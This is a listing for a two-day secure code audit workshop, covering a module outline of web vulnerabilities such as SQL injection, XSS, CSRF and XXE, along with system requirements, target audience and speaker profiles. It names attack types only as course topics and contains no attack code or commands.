Contact Details

Hacking and Cyber Security Briefing
manu
Manu Zacharia
+91-98470-96355
thomas
Thomas Kurian Ambattu
+91-94470-22081
akash
Akash Joseph Thomas
+91-94974-65363

WS - 6

Secure code audit - NINJA Edition

WS - 6

Secure code audit - NINJA Edition

 

Workshop Objective:

Secure code audit is a highly effective process of identifying vulnerabilities in software. This process requires a more in-depth analysis of an application in order to find the security flaws.

This training will be hands on on how to do secure code analysis & review, so you need to bring your own laptop to perform different types of attacks on web based applications.

Course Content (ToC):

    DAY 1

    • Module 1: Introduction to Secure Source Code Practices (SSCP)
      • What is SSCP
      • Need for SSCP security solution
    • Module 2: Parameter manipulation attack and Defenses
      • Bypassing client-side validation
      • Variable manipulation attacks
      • Input validation types
      • Black list vs White list filters
      • File Upload attacks and best practices
      • Insecure Direct Object References
      • Exploit CSV based export features using formula injection
      • Best practices and guidelines to avoid these Attacks
      • Demo
    • Module 3: SQL- Injection
      • Blind & Second Order SQL injection
      • Demo
    • Module 4: Cross Site Scripting (XSS)
      • Reflected, Stored and DOM based XSS
      • Best practices and guidelines to avoid Cross Site Scripting Attack
      • Demo
    • Module 5: Cryptography
      • Encryption & Decryption
      • Encoding & Decoding
      • Hashing
      • Salted hash technique
      • Storage of critical information in backend side
      • Demo
    • Module 6: Cross Site Request Forgery (CSRF)

    DAY 2

    • Module 1: Broken Authentication and Session Management
      • Best practices to manage session
      • Proper cookies attributes set
      • Proper implementation of OTP & CAPTCHA
      • Demo
    • Module 2: Error Handling and Logging
      • Proper implementation of log
      • Proper error handling
      • Demo
    • Module 3: Code quality
      • Language specific configuration check
      • Hard coded information
      • Critical information in comment
      • Client side hardcoded information
      • Best practices to check unused code
      • Demo
    • Module 4: XML external Entity (XXE) Attack
    • Module 5: Deserializing Objects
    • Module 6: CTF challenge on vulnerable source code application for attendees

Pre-requisite

  • Secure code audit is a highly effective process of identifying vulnerabilities in software. This process requires a more in-depth analysis of an application in order to find the security flaws.
  • This training will be hands on on how to do secure code analysis & review, so you need to bring your own laptop to perform different types of attacks on web based applications.
  • System Requirements:
    • Windows/Linux/OsX Installed machine
    • RAM – 8GB
    • Free space in your machine – 20GB
    • Installed VMware Player in your machine
    • Visual Studio installed
    • Notepad++

Who should attend:

  • Those who want to build secure applications.
  • Those having basic development background.
  • Those who want to perform a manual secure source code review.
  • Those who want to learn various secure code audit methodologies and approaches.
  • Those who have very basic knowledge in OWASP Top 10.

What to expect:

  • Exposure to different tools used for secure code audit
  • Demo application to perform secure coding practices
  • Hands on CTF challenges

What not to expect:

  • Any professional tools

Speaker Profile:

Manoj Kumar , co-founder | h1hakz

Manoj Kumar has more than 6 years of experience in the field of Application Security and Secure coding process and a co-founder of h1hakz. He has Developed many Secure Application Projects using different languages and has Code reviewed a wide range of applications, from embedded systems to web applications including Retail Banking and E-commerce Application. Also given training on c0c0n XI, Bslides delaware, WOPR, HackMiami etc....

  • Company/Organization: h1hakz
  • Country: India
Ranjith Menon , co-founder | h1hakz

Ranjith Menon who has more than 8 years of experience. He is an active player on Bug bounty programs and specialized in Web application, Mobile, Cloud and a contributor to the Security Community and co-founder of h1hakz, an open platform for knowledge sharing through webcast series. Also, he has found many vulnerabilities for many organizations. Also given training on c0co XI, Bslides delaware, WOPR, HackMiami etc.Apart from hacking, he gets time for fitness from his work schedule.

  • Company/Organization: h1hakz
  • Country: India